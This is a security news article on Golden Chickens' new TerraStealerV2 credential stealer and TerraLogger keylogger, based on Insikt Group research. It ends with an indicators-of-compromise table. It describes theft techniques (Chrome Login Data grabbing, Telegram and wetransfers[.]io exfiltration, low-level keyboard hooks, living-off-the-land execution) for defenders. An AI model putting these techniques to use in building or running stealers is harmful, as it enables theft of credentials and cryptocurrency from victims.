The financially motivated cybercrime group, Golden Chickens-operating under the alias Venom Spider-has rolled out two new malicious tools, TerraStealerV2 and TerraLogger, marking a sharp escalation in credential and sensitive data theft operations in early 2025.
These developments, tracked by Recorded Future’s Insikt Group, signal ongoing innovation in the group’s Malware-as-a-Service (MaaS) platform, historically leveraged by notorious syndicates such as FIN6, Cobalt Group, and Evilnum.
Stealer & Logger: Technical Evolution
TerraStealerV2 is meticulously engineered to exfiltrate browser credentials, cryptocurrency wallet data, and details from browser extensions.
Technically, the malware zeroes in on the Chrome “Login Data” SQLite database, making direct data grabs.
However, TerraStealerV2 does not circumvent Chrome’s Application Bound Encryption (ABE) introduced in July 2024, indicating that the malware may either be incomplete or lagging the current browser security paradigm.
Data lifted by TerraStealerV2 is transferred via the Telegram bot infrastructure and a secondary endpoint-wetransfers[.]io-both integrated seamlessly into attack chains.
Distribution vectors for TerraStealerV2 are exceptionally diverse, comprising Windows shortcut links (LNK), installer packages (MSI), dynamic-link libraries (DLL), and executables (EXE).
Execution relies heavily on trusted Windows utilities like regsvr32.exe and mshta.exe, a move that aids evasion of conventional endpoint detection and response (EDR) solutions.
Once executed, the malware performs anti-analysis checks, leverages XOR string deobfuscation, gathers system and user information, and attempts to terminate active Chrome processes to unlock credential files.
After assembling the digital loot-login credentials, browser extension data, and wallet directories-TerraStealerV2 compresses data into an archive for exfiltration.
This archive is sent both to the orchestrator’s Telegram channel and the wetransfers[.]io infrastructure, where criminal operators collect it.
Notably, the malware signals each successful compromise, transmitting host identifiers and the number of wallets discovered.
In parallel, TerraLogger introduces a standalone keylogging capability to the Golden Chickens toolkit-another first for the group.
The logger uses a standard low-level Windows keyboard hook (SetWindowsHookExA with the WH_KEYBOARD_LL flag), capturing all keystrokes and saving them to files on disk (e.g., a.txt, op.txt, save.txt).
Unlike mature infostealers, TerraLogger currently has no built-in exfiltration, suggesting it is intended as a modular component or remains in early-stage development.
Attribution, Impact, and Ongoing Threats
Golden Chickens’ latest toolkit reinforces their reputation as a premier MaaS provider, underpinning sophisticated access and data theft campaigns against high-value targets.
The group’s malware ecosystem is deeply modular, allowing crimeware operators to chain components like VenomLNK, TerraLoader, and now TerraStealerV2 and TerraLogger for tailored attacks.
Attribution efforts tie the Golden Chickens operation to personas in Eastern Europe and North America, with a development lineage spanning from underground forums to high-profile intrusions affecting multinational brands.
Current samples of TerraStealerV2 and TerraLogger lack the stealth and encryption-bypass sophistication of the group’s most advanced offerings.
Nevertheless, there is consensus among researchers that these tools will quickly evolve, integrating more robust evasion and exfiltration features as updates roll out.
Indicators of Compromise (IOCs)
| Threat Component | SHA-256 / Path / Domain | Description/Use |
|---|---|---|
| TerraStealerV2 | 828eee78537e49b46e34a754306ccf67f6281b77e5caeaf53132a32b6b708e5c | Payload hash (sample) |
| TerraStealerV2 | wetransfers[.]io, wetransfers[.]io/uplo.php, wetransfers[.]io/v.php | Exfiltration and download infrastructure |
| TerraStealerV2 | Telegram bot: NoterdanssBot; Channel: -4652754121 | Exfiltration C2 via Telegram |
| TerraLogger | 067421234fdd631628569bd86b6757ce4c78139c3609493c92db7b096b0c22f4 | Sample (compiled 2025-01-13 14:16:35 UTC) |
| TerraLogger | c:\programdata\save.txt, c:\programdata\a.txt, c:\programdata\op.txt, c:\programdata\f.txt | Keystroke log locations |
| Distribution Chain | regsvr32.exe, mshta.exe, curl.exe, PowerShell | Living-off-the-land tools used for execution |
| Distribution Chain | LNK: 9aed0eda60e4e1138be5d6d8d0280343a3cf6b30d39a704b2d00503261adbe2a | Example delivery sample |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
